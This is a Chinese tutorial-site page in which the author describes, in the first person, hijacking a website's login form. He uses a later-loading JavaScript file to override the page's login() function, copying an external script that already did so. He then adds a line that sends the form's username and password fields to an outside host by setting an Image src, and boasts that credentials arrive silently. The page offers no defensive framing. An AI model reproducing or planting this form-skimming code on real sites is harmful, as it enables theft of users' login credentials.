网站地图    收藏   

主页 > 系统 > windows >

js代码另类劫持登录表单 - Windows操作系统 - 自学

来源:自学PHP网    时间:2015-04-17 17:13 作者: 阅读:

[导读] 另类在哪呢?另类在页面自带一个外部js,劫持login这个function,而我恰能修改它下面的一个js(唯一一个,而且是废弃不用了的)。那个js里面的代码用了jQuery,把之后再加载的网页自身...

另类在哪呢?另类在页面自带一个外部js,劫持login这个function,而我恰能修改它下面的一个js(唯一一个,而且是废弃不用了的)。

那个js里面的代码用了jQuery,把之后再加载的网页自身的function login给替换为自己的function。

=========

我的权限:可修改那个外部js下面的一个js,命运啊,偏偏我能那么做。

--------------------------

我js很菜的,现在这情况,居然也能发挥一下了,我把我能控制的js内容完全copy了那个外部js,

由于我的js比那外部js后加载,于是我在里头修改后的函数才是真被调用的那一个。

记得吗?那个外部js劫持了网页的login这个function(暂且叫用自己的A函数替换了那个login函数,人家这么做有一些其他目的,倒方便我照抄了),这个function是用来检查表单用户名密码填了没有的.

太好了,现在我的js的A函数才是真正替代了login函数的,于是A函数里加一句(new Image()).src='http://xxx"+document.loginForm.yh+document.loginForm.mm;

oh,yeh,点击登录按钮后,用户名密码就悄悄发来了。


自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论